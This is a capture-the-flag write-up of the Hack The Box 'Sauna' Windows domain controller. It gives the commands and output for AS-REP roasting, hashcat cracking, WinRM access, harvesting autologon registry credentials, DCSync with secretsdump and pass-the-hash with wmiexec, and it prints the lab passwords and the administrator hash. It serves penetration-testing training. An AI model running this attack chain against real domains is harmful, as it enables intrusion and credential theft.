Hackthebox – Sauna

As with any box, Sauna is also started by performing a number of port scans.

root@kalivm:~/Sauna# nmap -sTV -p 1-65535 -oN fullscan_tcp
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 15:05 CEST 
Strange read error from (71 - 'Protocol error')
Nmap scan report for
Host is up (0.16s latency).
Not shown: 65514 filtered ports
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-06 22:29:19Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
45726/tcp open  tcpwrapped
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
61473/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1470.69 seconds

So from the looks of it, this appears as a Windows Domain Controller for the EGOTISTICAL-BANK.LOCAL domain. In addition, a web server seems present and it is quite interesting that the winRM port is open on 5985 and of course, the SMB port 445 is always interesting. Time to start the enumeration.

root@kalivm:~/Sauna# smbclient -L \\ -N
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[]
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

The first enumeration of the SMB port was very unfortunate. It yielded no results so far, so I decided quickly to continue on the Domain Controller part with LDAP.

root@kalivm:~/Sauna# ldapsearch -x -H ldap:// -b "dc=egotistical-bank,dc=local" 
# extended LDIF
# LDAPv3
# base <dc=egotistical-bank,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL

objectClass: top
objectClass: domain
objectClass: domainDNS

After fiddling with ldapsearch for a while, I finally started to get some results that appeared to be headed in the right direction. However, I still was unable to find some useful credentials.

root@kalivm:~/Sauna# GetNPUsers.py -dc-ip -no-pass "EGOTISTICAL-BANK.LOCAL/hsmith"
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for hsmith
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set

Hugo Smith looked like something and I started to fiddle a bit with GetNPUsers.py in order to get a TicketGranting Ticket as I had also done with Hackthebox – Forest but still did not yield a useful result. I almost forgot about the website but as I got more and more stuck, I decided to take a look there.
eBank main page
First I ended up on the frontpage, and from there on, I browsed a bit but found nothing of particular interest. Until I ended up at the ‘about’ page.
eBank Team
This page contained two names that appeared as interesting, Fergus Smith and Hugo Bear. Hugo Smith in the LDAP entries. Perhaps these are actual users on the system.

root@kalivm:~/Sauna# GetNPUsers.py -dc-ip -no-pass "EGOTISTICAL-BANK.LOCAL/hbear" 
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for hbear
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
root@kalivm:~/Sauna# GetNPUsers.py -dc-ip -no-pass "EGOTISTICAL-BANK.LOCAL/fsmith"
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for fsmith

After first trying Hugo Bear, I got the KDC_ERR_C_PRINCIPAL_UNKNOWN error, meaning that this user simply does not exist on the system. With fsmith it went much better. I immediately was presented with his TGT entry which I could now put into hashcat to see if I could crack the password.

[hashcat] $ hashcat -m 18200 -a 0 -w 3 sauna_smith.hash rockyou.txt 
hashcat (v5.1.0) starting...

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:7cd3f74...384207
Time.Started.....: Fri Mar  6 16:26:17 2020 (1 sec)
Time.Estimated...: Fri Mar  6 16:26:18 2020 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 11060.9 kH/s (13.67ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 11141120/14344386 (77.67%)
Rejected.........: 0/11141120 (0.00%)
Restore.Point....: 10485760/14344386 (73.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: XiaoNianNian -> Gangie
Hardware.Mon.#1..: Temp: 36c Fan: 24% Util: 28% Core:1898MHz Mem:3802MHz Bus:16

Started: Fri Mar  6 16:26:15 2020
Stopped: Fri Mar  6 16:26:20 2020

So the password for mister fsmith is Thestrokes23! Awesome, now we can continue with smb and winRM!

root@kalivm:~/Sauna# smbclient -U fsmith -L \\
Enter WORKGROUP\fsmith's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        RICOH Aficio SP 8300DN PCL 6 Printer   We cant print money
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

On the SMBServer, after some browsing through the NETLOGON ans SYSVOL shares I came to the conclusion that none of the shares were of particular interest, so I continued with the winRM script that I had also used on Hackthebox – Forest with great success.

root@kalivm:~/Sauna# ruby sedje.rb 
PS > whoami

After adjusting the IP, username and password, I was now ready to go play with powershell on the target.

PS > type ../Desktop/user.txt

And with that shell, I could easily obtain the user flag too!

Privilege Escalation

So now that I’m on the box, its time to become administrator and get the root flag.

PS > Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
DefaultDomainName DefaultUserName                 DefaultPassword
----------------- ---------------                 ---------------
EGOTISTICALBANK   EGOTISTICALBANK\svc_loanmanager Moneymakestheworldgoround! 

After some searching through files and services as part of the normal privilege escalation I took a shot at the Autlogon settings and found a password for the account svc_loanmanager. However, in the previous enumeration, I had seen a similar account with a shorter name being present on the system called svc_loanmgr.

root@kalivm:~/Sauna# secretsdump.py -dc-ip svc_loanmgr:Moneymakestheworldgoround\!@
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...

One try with the secretsdump tool from impacket and there we have it. The NTLM Password hash of the Administrator user. Remarkable detail is that both fsmith and hsmith apparently share the same password. After running it through a quick hashcat, I was unable to crack it in short time so I decided to try a pass the hash attack while the cracking was running.

root@kalivm:~/Sauna# wmiexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff administrator@
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

So that worked, I’m logged in as the administrator. Now I can kill the cracking process and get the root flag!

C:\>cd Users/Administrator/Desktop
C:\Users\Administrator\Desktop>type root.txt

And there we have it, the root flag!

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.